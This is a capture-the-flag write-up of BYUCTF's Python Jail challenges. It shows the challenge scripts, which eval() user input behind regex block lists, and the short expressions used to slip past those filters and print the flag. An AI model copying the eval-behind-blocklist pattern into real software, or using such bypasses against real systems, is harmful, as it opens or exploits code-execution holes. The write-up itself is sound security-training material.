>> Home / byuctf / unicode, jail
∵ ollvirt2 ∴ 2021-12-15 ∞ 4'
The Python Jail series consists of 4 challenges revolve around a set of Python 3 scripts, in which the goal is to pass a Python expression over netcat that will extract the flags stored on the server. These flags are printed to stdout, and it happens that all stdout from the program is piped back to us.
Let's take a look at the code for Python Jail 1 (the simplest).
import re
# We have a file on our server called answer.py with the flag stored. In order to
# read it, you must type in Python code that evaluates to 1337
from answer import FLAG
# these are all the characters or symbols you can't use - you must write Python code that equals 1337 WITHOUT these
regexes = [
# no two digits in a row (aka 13 and 37 will be caught)
r'\d\d',
# no common math symbols
r'\+',
r'-',
r'\*',
r'/',
# we've removed other characters
r'<',
r'>',
r'\^',
r'v',
r'&',
r'\|',
r'_',
r'%',
# blocks all Unicode symbols and 'exec' and 'class' to prevent unwanted RCE
r'[\U000000ff-\U0010ffff]',
r'exec',
r'class'
]
inp = input('>>> ')
if any([re.search(r, inp) for r in regexes]):
print("Don't do bad stuff")
exit()
if eval(inp) == 1337:
print(FLAG)
else:
print('wrong')
Looks like we can't use a very direct method (sending 1337
), but we can call whatever functions we want (outside of exec
and the keyword class
). So, let's circumvent the conditional completely and send print(FLAG)
.
print(FLAG)
ctf{...}
wrong
Very cool! We can skip Jail 2 because the exact same thing works.
However, in the code for Jail 3, we have:
regexes = [
r'\d\d',
r'\.',
r'\+',
r'-',
r'\*',
r'/',
r'>',
r'v',
r'"',
r"'",
r'\(',
r'_',
r'[\U000000ff-\U0010ffff]',
]
Well, with left parenthesis gone, looks like our function-calling days are over. However, we received a new mathematical operation: ^
, which is XOR in Python. We still need a way of getting our operands to not contain consecutive digits. With Python's native prefix for hexidecimal numbers, maybe we can find a stable hexidecimal expression for 1337. Opening the Python REPL, let's look at 1337 directly.
>>> hex(1337)
'0x539'
Hmm, that will not do. But with XOR, maybe we can get something useful. Let's take that expression and calculate XOR with 0xfff
on the left-hand side.
>>> hex(0xfff^0x539)
'0xac6'
Perfect! That means we have
>>> 0xfff^0xac6
1337
Send that expression to Jail 3, and we have our flag!
That leaves us with only Jail 4, which looks like this:
import re
from answer import FLAG
regexes = [
r'\d\d',
r'\+',
r'-',
r'\*',
r'/',
]
inp = input('>>> ')
if any([re.search(r, inp) for r in regexes]) or (len(inp) > 8):
print("Don't do bad stuff")
exit()
if eval(inp) == 1337:
print(FLAG)
else:
print('wrong')
At first glance, this doesn't look all that menacing. That's until noticing the length restriction of 8. This means none of our past solutions will work immediately. However, Unicode characters are no longer filtered out in this Jail. That leaves a surprisingly simple solution. In the Python REPL, we can get a character mapping to 1337.
>>> chr(1337)
'Թ'
>>> ord('Թ')
1337
And it so happens that ord('Թ')
is precisely 8 characters. Sending this to the server for Python Jail 4 nets us our last flag of the series. I've heard that the intended solution to Jail 4 is 1_3_3_7
, which is only 7 characters. This is because Python allows underscores in numbers for formatting, and will interpret this without underscores. Hence, we've successfully solved the Python Jails the wrong way.
Bypassing filters is a common challenge for exploits. Most RCE or SQL Injection payloads rely on some method of encoding to avoid being filtered out by WAFs and the like. Thus, by learning how to bypass filters, we can better develop effective exploits as a red team or patch discovered vulnerabilities as a blue team.
Thanks for reading!